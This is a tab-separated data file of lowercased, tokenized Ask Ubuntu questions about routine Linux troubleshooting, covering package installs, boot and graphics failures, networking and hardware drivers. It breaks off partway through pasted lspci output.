380346	how to install gstreamer 1.0 in ubuntu 12.04	the install given elsewhere in the forum is sudo add-apt-repository ppa : gstreamer-developers/ppa sudo apt-get update sudo apt-get install gstreamer1.0* which is n't currently working for my 12.04 install [ see below ] does anyone have updated info or a fix to the instructions ? i did the above but still fail to find the gst namesapace , i get the message traceback ( most recent call last ) : file `` webcam-1.0.py '' , line 4 , in < module > gi.require_version ( 'gst ' , '1.0 ' ) file `` /usr/lib/python2.7/dist-packages/gi/__init__.py '' , line 48 , in require_version raise valueerror ( 'namespace % s not available ' % namespace ) valueerror : namespace gst not available and to be sure , i redid the above steps and then noticed that the regex idenitifed some libraries that were then not marked for install . i decided to try one of them explicitly by name and got the below . $ sudo add-apt-repository ppa : gstreamer-developers/ppa $ sudo apt-get update [ all went ok ] $ sudo apt-get install libgstreamer1.0-dev reading package lists ... done building dependency tree reading state information ... done package libgstreamer1.0-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libgstreamer1.0-dev ' has no installation candidate
380351	is chmod +x ./expand_lapw correct ?	i 'm new user of ubuntu . i have used redhat , however i wrote : chmod +x ./expand_lapw but there is nothing happen . please let me know ?
380361	creating bootable usb on ubuntu start disk creator issue	i have followed these instructions using start disk creator erase the usb mount the ubuntu-13.04-desktop-amd64.iso of ubuntu 13.04 make startup disk and it goes to the 41 % in just few seconds and just close nothing happen after that , and surely it does n't work on other computer where i need to install ubuntu . tried unetbootin it takes its time to make the bootable usb but when i boot it on another system to install the ubuntu it gives the error secure boot is not enable and a black blank screen appears and nothing happens looked into boot options of bios but there are few options like usb_cd usb cd_rom hard disk etc and cant select those using ubuntu 13.10 laptopo model is lenovo b570 not sure what to do with this problem help !
380362	apt-get update error source/source/sources ubuntu 13.04	i am faced with an an annoying error with apt-get update which is giving me the annoying red triangle telling me my sources.list is wrong or malformed . i 've checked my sources file over an over and i can not seem to figure out what is wrong with it . here 's screenshot of what i 'm getting i 've tried doing sudo apt-get clean all but this did n't do anything to fix it . i did even try just simply deleting the sources.list file and just do sudo apt-get update to just create a new sources.list , but i 'm then again presented with the same error over and it 's getting annoying having that stupid recurring red triangle in the top of my menu bar . why do i have a deprecated or non-working deb/deb-src url for http : //archive.canonical.com/ubuntu/dists/raring/release that it ca n't even grab properly ? does canonical even provide software for 13.04 at all or should i just have to disable it completely ?
380365	how to install mplayer1.1 in ubuntu 13.10 ?	is there any way i can install mplayer 1.1 in my ubuntu 13.10 ? ubuntu repositories are having mplayer 1.0 & they do n't have mplayer 1.1 . how can i install it ?
380372	is it possible to run applets in ubuntu running gnome 3.x style instead of unity ?	i want an email applet on the top right , im just assuming their also called applets in the gnome style launcher . what would the desktop environment be called ? like unity is that a shell ? or just a desktop environment ?
380374	can ping but can not wget with server name	i have a problem . with the help from the people at this forum i managed to setup my network . to recapitulate i have two computers comp1 and comp2 connected like this comp2 ( eth0 ) - > comp1 ( eth1 ) comp1 ( eth0 ) - > network my interface looks like this : comp1 : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 10.10.0.10 netmask 255.255.255.0 comp2 : auto eth0 iface eth0 inet static address 10.10.0.20 netmask 255.255.255.0 gateway 10.10.0.10 comp2 $ route kernel ip routing table destination gateway genmask flags metric ref use iface default 10.10.0.10 0.0.0.0 ug 100 0 0 eth0 10.10.0.0 * 255.255.255.0 u 0 0 0 eth0 comp1 : $ route kernel ip routing table destination gateway genmask flags metric ref use iface default g128.mp.l 0.0.0.0 ug 100 0 0 eth0 10.10.0.0 * 255.255.255.0 u 0 0 0 eth1 10.128.0.0 * 255.224.0.0 u 0 0 0 eth0 now : i can ssh into my comp2 and ping 8.8.8.8 and i get : ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_req=1 ttl=43 time=42.6 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=43 time=41.8 ms but if i try to wget : wget -o - 173.194.70.113 | grep google function n ( ) { if ( google.timers.load.t ) { google.timers.load.t.ol= ( new date ) .gettime ( ) ; google.timers.load.t.iml=e ; google.kcsi.imc=c ; google.kcsi.imn=b ; google.kcsi.imp=d ; void 0 ! ==google.stt & & ( google.kcs ... which is ok but if i try it like this : wget -o - http : //www.google.com |grep google -- 2013-11-21 15:07:35 -- http : //www.google.com/ resolving www.google.com ( www.google.com ) ... failed : temporary failure in name resolution . wget : unable to resolve host address `www.google.com ' which implies to me that this is a dns server problem . my less /etc/resolv.conf on comp1 looks like this : dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search xxx.xxx.xxx xxx are not important but on comp2 it looks like this : dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) do not edit this file by hand -- your changes will be overwritten how to set this up ?
380376	iso fails to burn in k3b	i was trying to burn zorin os 6.4 lts on to a dvd+r disc , so that i could have it on my laptop . anyway , it started to burn it , but it failed and ejected the disc . here 's what it said in the status bar-thingy : writing double-layer dvd+r using wodim 1.1.11 copyright ( c ) 2006 cdrkit suite contributors starting at 1x speed unable to open a new session probably a problem with the medium
380378	installing bitcoin on ubuntu 13.10	i 've been using ubuntu for a little over a year now and have gotten fairly comfortable with the ui . the one case i 've had trouble on was recently trying to install bit coin on my 13.10 computer . when i open up the deb file and it takes me to the software center where there should be an install button there 's something about libdb4.8++ . thankyou in advance .
380382	how to replace samba ?	what is the best way to replace 12.04 's pre-loaded samba with centrify-enabled samba ? i tried just uninstalling it , but it looks like nautilus is dependent on it . any ideas ? do i need to uninstall nautilus too ?
380383	after installing ubuntu as dual-boot : hdd raw format	i had installed win7 on my ssd 128gb and wanted to add ubuntu 12.04 lts on it . my ubuntu iso was created on an usb stick using yumi multi-os installer . so i booted from usb , selected ubuntu and then chose the option to install ubuntu beside win7 . i thought that it would install my ubuntu on the 128gb ssd and i think it did this . but my 500gb data drive seems to be affected by the installation . on windows it shows that the data hdd is partitioned into 3 parts : 1mb , 453,68gb raw and 11,96gb primary partition . i dont know why the installer affected my 500gb data drive , but i cant access my files neither on win7 nor on ubuntu . i 'm sure that this can be fixed , but i 'm pretty new at ubuntu and could n't find a solution on my own . sudo parted -l shows : modell : ata m4-ct128m4ssd2 ( scsi ) festplatte /dev/sda : 128gb sektorgröße ( logisch/physisch ) : 512b/512b partitionstabelle : msdos nummer anfang ende größe typ dateisystem flags 1 1049kb 106mb 105mb primary ntfs boot 2 106mb 128gb 128gb primary ntfs modell : ata wdc wd5000aajs-0 ( scsi ) festplatte /dev/sdb : 500gb sektorgröße ( logisch/physisch ) : 512b/512b partitionstabelle : gpt nummer anfang ende größe dateisystem name flags 1 17,4kb 134mb 134mb microsoft reserved partition msftres 2 135mb 136mb 1049kb bios_grub 3 136mb 487gb 487gb ext4 4 487gb 500gb 12,8gb linux-swap ( v1 ) how can i fix this issue ? i asked this question on an other forum , too . people told me , that ubuntu deleted my 500gb hdd date device . but i still dont understand why this happened . i had 2 hdd 's connected with my computer : device1 : ssd 128gb ( windows 7 installed on it , i think it should be msdos ) device 2 : hdd 500gb ( only data , ntfs data-system ) after booting the ubuntu from usb stick i had 3 options how to install it : a ) install ubuntu beside win7 b ) delete win7 and replace it with ubuntu c ) other / custom installation . i am a big noob at linux , but i thought : ok , he found my win7 installation and he can install ubuntu beside win7 ( on my ssd 128gb ) . yes , thats what i chose . but instead of it the isntaller deleted my 500gb hdd and replaced it with ubuntu . thats not what i wanted . but i would be thankful if somebody could give me a reason why such a mistake could happen . gladfully , yesterday i made a backup of 80 % of my data .
380384	ubuntu 13.10 networking issue	i have ubuntu 13.10 i have a static ip set on it of 192.168.1.100 , the networking works perfictly for a while , then ocationally shuts off completly when i do ifconfig it still shows as 192.168.1.100 but i can no longer ping it and can no longer ping out i know it is not a cabling or nic issue becouse i have a virtual machine ( using kvm ) that is bridged to the same addapter and that is always accessable
380388	telkom mobile 3g modem ( south africa )	i have a telkom mobile 3g modem and i am using ubuntu 12.04 but i ca n't get ubuntu to recognize or load the modem . are there any solutions ?
380389	is it a problem in wine : small and upper caps ?	is it a problem if a folder exists in wine / playonlinux twice ? for example 'music ' and 'music ' or 'obse ' and 'obse ' . should n't it be changed , because windows does n't differentiate between small and upper caps ?
380391	unable to login	i am unable to login to my primary account . after i input the password , it loads for a while and then again i see the splash screen asking me to input my password again . sometimes it shows mountall and disconnected plymouth or something like that . i changed my root password but still i cant access it from my guest account . how do i solve these problems ?
380394	ardour memory limit warning	i get this warning from ardour . i 'm running on 64-bit ubuntu 13.10 , envy 14 . 8gb of ram ( that i know my motherboard can take because it works on windows ) . `` warning : your system has a limit for maximum amount of locked memory . this might cause ardour to run out of memory before your system runs out of memory . you can view the memory limit with 'ulimit -l ' , and it is normally controlled by /etc/security/limits.conf what should i do ?
380397	some trouble with connecting the android with the ubuntu pc	when i press the volume + and - then the power button , it either start showing me something strange , like some texts and then only the v- works but just to show the same text all over again with no option or anything , and i have to pull out the battery to be able to reboot , or it goes straight for the android desktop , but if i press v+ and home button ( the middle one on the bottom ) then power , and release power button when it vibrates still pressing the other 2 , only then it starts a menu with load adb from card or memory , reboot , factory reset and that 's it and the ubuntu still says mtp error when connecting the phone with the pc while in that recovery mode , please help , i also rooted the phone , then unrooted it in the hope that i can do a clean root and unlock from the recovery menu ( just as an info , my phone is unlocked for use of any available gms network )
380401	is it possible to run unity 7 on 12.10 ( or maybe 12.04 ) ?	i saw a question regarding a backport from 12.10 unity to 12.04 ; but i would be more interested in checking out unity 7 on my current 12.10 installation . ( updating my system to 13.04 , 13.10 is unfortunately not an option - so far , our company is not allowing us to use these versions of ubuntu )
380403	ubuntu to be used to review bad disk/sector	the reason i want to install ubuntu is that i was informed i could use it to review a disk that windows is having issues accessing . i am not sure if that is because of a bad disk sector or if windows is mentally failing at accessing it or what . here 's my plan and i need assistance in what i should be doing : ext hdd has 172 folders : all but one is available to me in windows . i can see the inaccessible one , but i ca n't move data from it , open the folder , etc ( whether using dos , windows explorer or winrobocopy ) i want to use ubuntu to try and access that external hdd and that specific folder so i can safely move the files ( important files ) . so , i need to install ubuntu - but where ? i do not plan on using it ( yet ) as my primary operating system and am not looking for dual-boot even ( at least not yet ) . do i install it on my laptop hard drive ? can i install it on a thumb drive as some have suggested ? i have ubuntu desktop downloaded ( nothing installed anywhere yet though ) . that 's all i 've done , but i really have no idea what to do next . i would consider myself an intermediate techy ( although you may not think so from this explanation ) . any guidance / assistance would be greatly appreciated .
380404	texlive-common and lang-norwegian not cooperating	i got sublime and texlive working , but i 'm norwegian and want to write in norwegian so i 'm trying to install that language . but , this is what i get : texlive-lang-norwegian : krav : texlive-base ( > = 2009-1 ) krav : texlive-common ( > = 2009-1 ) it 's norwegian , but it says it ca n't install . any good ideas ? my version of texlive-common : package : texlive-common priority : optional section : tex installed-size : 296 maintainer : debian tex maintainers < debian-tex-maint @ lists.debian.org > architecture : all source : texlive-base version : 2009-11+squeeze1 depends : tex-common ( > = 2.0 ) conflicts : texlive ( < < 2009-1 ) , texlive-base ( < < 2009-1 ) , texlive-base-bin ( < < 2008 ) , texlive-bibtex-extra ( < < 2009-1 ) , texlive-binaries ... ... ... ...
380405	can not write active directory shares mounted with pam_mount	i am using centrifydc to connect an ubuntu 13.10 desktop to our active directory . login to the ubuntu computer using the ad credentials are working fine . i am using pam_mount to mount a share located in a windows 2008 r2 server everytime an ad domain user logs onto the ubuntu computer . the volumen definition in pam_mount.conf.xml file is as follows : volume user= '' my_user '' fstype= '' cifs '' server= '' my_server '' path= '' usersfolders/ % ( user ) /documents '' mountpoint= '' ~/userdocuments '' options= '' file_mode=0777 , dir_mode=0777 , sec=ntlm '' when i log on to ubuntu i can see that the share is mounted , i can access and open the files already stored in the share but i can not perform any change to them . save button is grayed in libreoffice . if i open a file with libreoffice , i can use the option saveas with a different name and the file is saved correctly but when i open it again the save button is grayed am i missing something ? could this be a problem with the way the shares are mounted or with libreoffice .
380407	how to install both ubuntu 10.04 and 12.04 lts simultaneously into virtualbox	i 'm using virtualbox and i want to have both both ubuntu 10.04 and 12.04 lts simultaneously into virtualbox , how can i do that . it giving me some trouble during the partition time .
380410	which properties define `` auto mount '' directory names ?	i have a second hard drive that i am regularly adding to my laptop in order to store backup data there . earlier on , after i logged in , the drive showed up in the unity launcher , i could click it , and it became mounted as `` /media/myuserid/backup '' . today , i had to give away the drive to a coworker , he used it for some installation . after i got it back , i just wiped his stuff , created a single ext4 partition , labeled it `` backup '' , like i did when initially preparing that disk . but now , when i click the `` drive icon '' in the launcher , the drive gets mounted like /media/myuserid/partition -- uuid so instead of using my label `` backup '' , it is mounted under the uuid of the partition . honestly , i liked the other behavior much better . any idea what is going on here ?
380413	mbp 15 '' retina - ubuntu 13.10 - only nvidia graphic , does n't find intel	i installed ubuntu 13.10+desktop+mac on my macbook pro 15 '' retina 10.1 with kernel 3.12 . my problem is , that ubuntu just found my nvidia graphic card and not my integrated intel . so i ca n't install bumblebee . lspci | grep vga shows : 01:00.0 vga compatible controller : nvidia corporation gk107 ; [ geforce gt 650m mac edition ] ( rev a1 ) and nothing else . any ideas to get the intel card work ? i want to use bumblebee to for a better battery life .
380415	need total instructions for installing railink rt3290 in 13.10	i need an help in installing this rt3290 drivers on ubuntu 13.10. as i am an beginner in ubuntu terminal i need instructions so that i can follow . my system is hp pavilion g6-2312ax . even i need to install amd catalyst drivers in ubuntu 13.10
380420	xsession error of .gnupg	i have an xsession error , which was saying : '' /usr/sbin/lightdm-session:1 : /home/manjil/.gnupg/gpg-agent-info- < my pc name > : syntax error ! ' ) ' unexpected . how do i fix this ?
380423	prevent sound fade settings from resetting after reboot	i am using a 5.1 sound setup and since my rear speakers are further away from me than my front ones , i use the system settings - > sound - > fade slider to make my rear speakers louder . this works fine , however after a reboot this setting is reset . how can i prevent this from happening or alternatively , how can i set it to the setting i want after a reboot ( through terminal ) ?
380424	understanding output of lvdisplay in lvm/linux	i am new to linux admin field i just want to know the meaning of following fields in lvdisplay output root @ sandbox : lvdisplay rootvg/swaplv | grep -i ' # open' # open 2 root @ sandbox : lvdisplay rootvg/swaplv | grep -i 'segments' segments 1 thanks in advance
380429	why only sudo'ers can execute the file ?	how is it possible that to be able to execute a binary file with 755 permission , one has to be in sudo'ers list ? i am trying to let a program run by a non-sudo user . it does not happen , but if i execute via sudo or as root , it works as it should . file permission is 755 root root . the whole program directory is in /opt . some details : ubuntu 12.04 server , 64bit the software is basically an old 32bit version of firefox 1.9.something , modified to some extent to connect to a tomcat server . update a user not listed in sudo'ers list can start the program . only my sudo user can not , i.e . by running simply ./program , sudo ./programm runs just fine .
380432	can not open session on ubuntu after install ubuntu-desktop	i have an ubuntu-server intalled vm . i would like to use server with gui . i have installed ubuntu-desktop . however i can not open session with gui . i got `` authorization faiulre '' . how can handle this problem ?
380434	set window icon to gtk stock icon in pygtk	i am trying to add a gtk stock icon to my window . here is the code : # ! /usr/bin/python from gi.repository import gtk class mywindow ( gtk.window ) : def __init__ ( self ) : gtk.window.__init__ ( self , title='my window title ' ) self.icon = self.render_icon ( gtk.stock_floppy , 1 ) self.set_icon ( self.icon ) self.connect ( 'delete-event ' , gtk.main_quit ) win = mywindow ( ) win.show_all ( ) gtk.main ( ) according to this page icon size should be one of gtk icon size constants but eclipse code completion does n't show any of the listed values and if i manually enter one of them i get attributeerror : 'gi.repository.gtk ' object has no attribute 'icon_size_small_toolbar' if i set the icon size to the literal 1 the script works . i 'm sure this has to do something with gtk or pygtk versions , but i ca n't figure what i am doing wrong . thanks in advance and sorry for the novice question .
380435	wifi issue on nexus 4 16gb	i had installed ubuntu on nexus 4 8gb and it ran ok , then i decided try into my nexus 4 16gb . in my nexus 4 16gb wifi doesnâ´t work , but i see imei code . whats the problem . i have tried some versions ( quantal , raring , saucy , ... ) and the problem is the same .
380437	black screen , blinking if alt+ctrl+f1	problem and what i 've done : i 'm having tons of trouble getting ubuntu to boot after installation . the grub menu works fine and i can boot into windows without problems . booting into ubuntu however not so successful . i 've tried various fixes , some of them i ca n't remember but two from this site i do remember are : my computer boots to a black screen , what options do i have to fix it ? blank screen after installing nvidia restricted driver ( this step is what got me into the broken gui ) i 've tried kernal upgrades/downgrades i 've tried multiple different nvidia drivers i 've tried adding `` nomodeset '' ( this allows me to at least get into the console , but not always ) tried `` noapic '' and `` nolapic '' to no avail ( this makes it worse in some cases ) running startx from the console , when i manage to make it that far , gives errors saying it 's already running . every boot up has the agpgart module failed to initialize error ( i ve also tried 2 fixes for this which did n't do much . with one i still got the error . ) i 've tried various methods of installing/updating/replacing and removing nvidia drivers . the best i 've done is get into ubuntu with massive black borders ( not filling my screen or seeing second screen ) . in fact ubuntu thought it was a laptop screen . also `` additional drivers '' does nothing , just loops it 's little loading bar thingy . < -- - for those who missed it , this is the broken gui scenario : d some of the fixes allow me to at least access the terminal to login and use commands , and with that i managed to try things up until i got into the broken gui mentioned above . i 've first tried installing with my own partitioning : '' /swap '' 8gb '' / '' rest of space with that installation i tried all the fixes and managed to get to my broken gui . after that i decided to re-install , this time picking the `` alongside '' option , however it has the exact same problem . the current situation and problem : i select ubuntu in grub ( windows still boots fine ) . it briefly displays a blinking cursor , then fades to black . as if the computer is going into sleep . if i then press ctrl+alt+f1 i get the blinking cursor with nothing to do but turn off the machine via the power button . i 'm assuming adding `` nomodeset '' will get me into the terminal like it did before . here is a link to information of my system : a link of average specs and some basic info this is just too keep the question relatively clean for anyone not interested in the nitty gritty . if there is another question that lead along these lines i apologize , in that case google has betrayed me and we 'll have to discuss where our relationship is headed .
380438	can not update youtube-dl	i use youtube-dl to download videos for watching later offline . usually , it works fine . however , due to frequent changes on the video sites , it sometimes requires a quick update . it was n't a problem before on 13.04 but after upgrading to 13.10 , i get # youtube-dl -u it looks like you installed youtube-dl with a package manager , pip , setup.py or a tarball . please use that to update . i tried updating it via apt-get but there is no new package . so the app 's update mechanism has been disabled and the maintainers are n't keeping up , what is the solution ? how do i update it ? and why was it changed at all ? it was updating a package manager version just fine in raring . i 'm already running into compatibility problems . $ youtube-dl `` http : //vimeo.com/55784152 '' [ vimeo ] 55784152 : downloading webpage [ vimeo ] 55784152 : extracting information error : unable to extract info section ; please report this issue on https : //yt-dl.org/bug . be sure to call youtube-dl with the -- verbose flag and include its complete output . make sure you are using the latest version ; type youtube-dl -u to update . quick update : as requested , # type youtube-dl youtube-dl is hashed ( /usr/bin/youtube-dl ) # apt-cache policy youtube-dl youtube-dl : installed : 2013.08.29-1 candidate : 2013.08.29-1 version table : *** 2013.08.29-1 0 500 http : //pl.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages 100 /var/lib/dpkg/status
380441	error while compiling qt with phonon	i have this problem . i have a code line : [ **qt += declarative network phonon** ] which says : [ *** : -1 : error : unknown module ( s ) in qt : phonon*** ] after compiling . i have tried to install phonon packages and they do n't help at all . i have newest version of qt . what should i do ?
380443	apple aluminium keyboard hub is supplied to little power	i have an apple aluminium keyboard with an integrated hub . on mac os x , i 'm able to connect both my mouse and a usb pen drive while on linux , the power limit is exceeded when connecting more than one device . i 'll be very happy if you are able to figure out why linux is unable to reconfigure the usb port to supply more power . here is the output from lsusb -vvv : bus 003 device 012 : id 05ac:1006 apple , inc. hub in aluminum keyboard device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 1 single tt bmaxpacketsize0 64 idvendor 0x05ac apple , inc. idproduct 0x1006 hub in aluminum keyboard bcddevice 96.15 imanufacturer 1 iproduct 2 iserial 3 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 300ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0001 1x 1 bytes binterval 12 update : the hub works perfectly if devices are enabled explicitly by entering the following command : root @ jonathans-imac : ~ # echo -n 1 > /sys/bus/usb/devices/1-1.2.1/bconfigurationvalue visit http : //lwn.net/articles/186331/ to get more information on this issue .
380447	uefi boot fails when cloning image to new machine	i have ten identical machines , and want to deploy the same ubuntu 12.04 image on all of them . i 've done a complete install on one of the machines , and cloned the disk using dd . the issue is that if i use dd to write this image to the disk of another machine , it will no longer boot . that is , the machine reports `` no bootable devices found '' on all machines except the one where i created the iamge . i suspect that this may be due to something device- or machine-specific about the way the uefi boot is set up , but i ca n't say for sure . i do n't do anything out of the ordinary as far as i 'm aware . for what it 's worth , running boot-repair on one of the clones does fix the problem and let the machine boot , but i 'd rather not have to run that manually on every new machine i want to clone the image to . also , this seems to tie the drive to that machine , so inserting a `` fixed '' drive into a machine other than the one boot-repair was run on will yield the `` no bootable devices found '' message again . clearly it must be possible to construct an image in such a way that the uefi boot entries will work on any machines , as this is what the ubuntu install image does , but i have no idea how it achieves that ? if it 's of any help , here is the boot info file generated by boot-repair when it fixed the disk on a new machine .
380453	what versions of ubuntu server include opensm ?	i need to run an infiniband subnet manager . i 've used opensm in the past , i liked it . does anyone know if server 12.04 or 13.10 include a working opensm ?
380456	how do i change keyboard layout in 13.10 ?	i want to use alt+shift as shortcut keys to change keyboard layout . how can i do it in ubuntu 13.10 ? changing language in other os , and previous ubuntu versions works immediately . but in ubuntu 13.10 i have to press shortcut keys and hold them for 1-2 seconds to act . why is that ? is it a bug ?
380458	ubuntu 12.04 138a:0017 driver for fingerprint reader is missing	in my laptop i have a fingerprint reader , and either fprint and fingerprint-gui cant detect it . i have ubuntu 12.04 lts the fingerprint id is as follows : bus 003 device 002 : id 138a:0017 validity sensors , inc. and one more question , ubuntu has certified all of the components of my laptop , like for example , my wifi card ( which currently has no driver ) , and the fingerprint sensor . one example for the certification is this one at www.ubuntu.com . ( which says that the fingerprint reader is supported ) i know that it was supported for a oem install by the manufacturer , however , i really would like to have the drivers . wifi card model : realtek 8192ee how can i resolve this ? $ ~ sudo rfkill list 0 : tpacpi_bluetooth_sw : bluetooth soft blocked : yes hard blocked : no the lsusb fingerprint reader related output ( since it is n't on pci ) : $ ~ lsusb -vv # just showing the fingerprint related output otherwise i think it would be too long . bus 003 device 003 : id 138a:0017 validity sensors , inc. device descriptor : blength 18 bdescriptortype 1 bcdusb 1.10 bdeviceclass 255 vendor specific class bdevicesubclass 17 bdeviceprotocol 255 bmaxpacketsize0 8 idvendor 0x138a validity sensors , inc. idproduct 0x0017 bcddevice 0.78 imanufacturer 0 iproduct 0 iserial 1 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 46 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xa0 ( bus powered ) remote wakeup maxpower 100ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 4 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0008 1x 8 bytes binterval 4 the full lspci -vv output : $ ~ lspci -vv 00:00.0 host bridge : intel corporation xeon e3-1200 v3/4th gen core processor dram controller ( rev 06 ) subsystem : lenovo device 220e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort+ > serr- < perr- intx- latency : 0 capabilities : < access denied > 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:01.1 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x8 controller ( rev 06 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00004000-00004fff memory behind bridge : f0000000-f0ffffff prefetchable memory behind bridge : 00000000c0000000-00000000d1ffffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 220f control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 46 region 0 : memory at f1000000 ( 64-bit , non-prefetchable ) [ size=4m ] region 2 : memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] region 4 : i/o ports at 5000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915_hsw 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) subsystem : lenovo device 220e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 43 region 0 : memory at f1630000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : lenovo device 220e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 48 region 0 : memory at f1620000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) subsystem : lenovo device 220e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx+ latency : 0 interrupt : pin a routed to irq 11 region 0 : memory at f1639000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > 00:19.0 ethernet controller : intel corporation ethernet connection i217-lm ( rev 04 ) subsystem : lenovo device 220e control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 42 region 0 : memory at f1600000 ( 32-bit , non-prefetchable ) [ size=128k ] region 1 : memory at f163f000 ( 32-bit , non-prefetchable ) [ size=4k ] region 2 : i/o ports at 5080 [ size=32 ] capabilities : < access denied > kernel driver in use : e1000e kernel modules : e1000e 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 220e control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 0 : memory at f163e000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 04 ) subsystem : lenovo device 220e control : i/o- mem+ busmaster+ speccycle- memwinv- 